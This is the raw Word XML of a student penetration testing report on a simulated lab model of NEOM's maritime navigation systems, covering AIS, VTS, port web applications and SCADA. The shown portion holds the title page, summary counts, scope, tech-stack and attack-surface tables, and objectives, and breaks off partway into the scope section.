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000"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Maritime Navigation Systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="500" w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">NEOM Smart City Platform  |  Vision 2030</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="160"/>
      </w:pP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Course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CYBS 3306 — Penetration Testing</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Analyst:</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Asma Aziz Aldahfeeri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May 2026</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Version:</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2.0 — Final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Classification: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Academic  |  Confidential</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="500"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">University of Hafr Al-Batin  |  Department of Computer Science and Engineering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This penetration testing report presents a comprehensive security assessment of the Maritime Navigation Systems deployed within the NEOM Smart City Platform — a flagship initiative aligned with Saudi Arabia's Vision 2030 digital transformation strategy. The assessment was conducted in a simulated lab environment under CYBS 3306 Penetration Testing course requirements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose of the Test:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">To simulate real-world cyberattacks against Maritime Navigation Systems — including AIS transponders, VTS dashboards, Port Management web applications, SCADA systems, and IoT marine sensors — in order to identify vulnerabilities before malicious actors can exploit them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scope:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AIS (Automatic Identification System) — vessel tracking and identification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VTS (Vessel Traffic Services) — traffic control dashboard and operations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Management Web Application — cargo, booking, and vessel registration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA &amp; IoT Marine Sensors — industrial control and environmental monitoring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Infrastructure — OT/IT network architecture and remote access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Findings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">20 vulnerabilities were identified across all assessed systems. The most critical findings include AIS Signal Spoofing, GPS Spoofing, unencrypted SCADA communications, unauthenticated API endpoints, and an exposed VTS dashboard — all posing immediate and severe threats to maritime safety and national security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Overall Risk Level:  CRITICAL — Immediate remediation required.</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Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="234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Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FEF3E2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E26B0A"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFDE7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="1"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F1F8E9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="375623"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t xml:space="preserve">0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">2. System Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The target system is the Maritime Navigation Infrastructure of the NEOM Smart City Platform — a next-generation coastal city being developed under Saudi Arabia's Vision 2030. The platform integrates digital maritime systems with smart city infrastructure to manage vessel traffic, port operations, and marine safety across the Red Sea coastline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Target System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80"/>
        <w:gridCol w:w="3880"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Subsystem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="328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 Stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="388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AIS Transponder Network</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VHF Radio + NMEA 0183 Protocol</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Real-time vessel tracking and identification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GPS Navigation System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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GPS/GNSS + INS Integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Position and route guidance for vessels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VTS Control Dashboard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Apache 2.4 / Web-based SCADA UI</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Traffic management and vessel monitoring</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Port Management System</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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PHP 7.0 / MySQL 5.7 / REST API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Vessel registration, cargo, and booking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SCADA / ICS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Modbus TCP / DNP3 Protocol</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Industrial sensor and actuator control</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IoT Marine Sensors</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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MQTT / CoAP over LTE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Environmental monitoring and buoy control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Network Infrastructure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Cisco Routers / Managed Switches</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OT and IT network connectivity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="100"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Attack Surface Mapping (Chapter 7 — Five Attack Families)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4460"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Attack Family</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Attack Surface Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="44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Applicable Flaws</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Injection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Vessel registration forms, API parameters, search fields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Flaws #11, #12, #13, #14</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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Authentication</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VTS login, port admin console, remote maintenance access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Flaws #6, #9, #10</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Network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AIS VHF channel, SCADA LAN, flat OT/IT network</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Flaws #1, #2, #3, #4, #5, #8, #17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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App Logic</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Cargo manifest API, file upload workflow, booking flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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Flaws #12, #15</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Infrastructure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 ports, default credentials, outdated firmware, no logs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Flaws #6, #7, #16, #18, #19, #20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Objectives</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Identify and classify security vulnerabilities across all maritime system components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assess the overall security posture of the NEOM Maritime Navigation Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Simulate realistic cyberattacks using Nmap, Wireshark, Metasploit, and Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Map all vulnerabilities to the five attack families defined in CYBS 3306 Chapter 7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide remediation recommendations aligned with IMO MSC-FAL.1/Circ.3 and BIMCO cybersecurity standards</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Support Saudi Vision 2030 by securing critical digital maritime infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Scope of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 In Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AIS transponders and VHF signal infrastructure (simulated lab)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">VTS (Vessel Traffic Services) web-based control dashboard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Management Web Application — registration, cargo, booking APIs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SCADA systems and IoT marine sensors (Modbus/DNP3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Network infrastructure: routers, switches, OT/IT segments</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote maintenance access points: SSH, VPN, Telnet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
